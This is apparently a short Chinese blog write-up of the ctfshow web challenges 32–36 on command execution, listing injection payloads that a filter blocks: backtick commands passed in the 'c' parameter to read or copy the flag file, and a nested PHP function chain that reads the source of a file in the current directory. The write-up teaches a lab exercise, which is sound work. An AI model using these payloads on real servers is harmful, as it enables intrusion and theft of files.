ctfshow-web入门-命令执行(web32-36)

 web32

 echo的过滤导致又有一些方法不能用了

失效的姿势:

因为过滤了system和反引号,所以

?c=`tac fla?.php`;

?c=echo `tac fl''ag.php`;

?c=echo `nl fl?g.php`;查看源代码

?c=`cp fla?.php 1.txt`;

没法用了

因为过滤了左括号,所以,

嵌套eval逃逸函数

show_source(next(array_reverse(scandir(pos(localeconv())))));

没法用了

嵌套文件包含,利用伪协议文件包含,再base64解码

你可能感兴趣的:(#命令执行,ctfshow,web安全)